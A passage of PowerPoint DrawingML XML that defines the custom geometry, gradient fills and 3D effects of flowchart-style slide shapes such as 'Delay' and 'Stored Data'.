                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 8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67622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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2000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="5900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5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1"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elay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1170306" y="2865307"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 82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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588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2000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1559530" y="3498729"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 110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561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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ored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1719578" y="2447169"/>
              <a:ext cx="160460" cy="825038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3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426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6" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert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ored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1719578" y="2447168"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx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395226" y="2754879"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="2410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"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1629368" y="3498729"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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670317" y="3716795"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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649" y="1026018"/>
              <a:ext cx="2198318" cy="22780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708069" y="1180060"/>
              <a:ext cx="2185416" cy="173011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="49000">
                  <a:srgbClr val="232323"/>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="dk1">
                    <a:satMod val="103000"/>
                    <a:lumMod val="102000"/>
                    <a:tint val="94000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="dk1">
                    <a:satMod val="110000"/>
                    <a:lumMod val="100000"/>
                    <a:shade val="100000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="dk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/>
            <a:effectLst>
              <a:outerShdw dist="12700" dir="5400000" algn="t" rotWithShape="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="40000"/>
                </a:scheme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lIns="45720" rtlCol="0" anchor="ctr">
              <a:sp3d extrusionH="6350">
                <a:contourClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
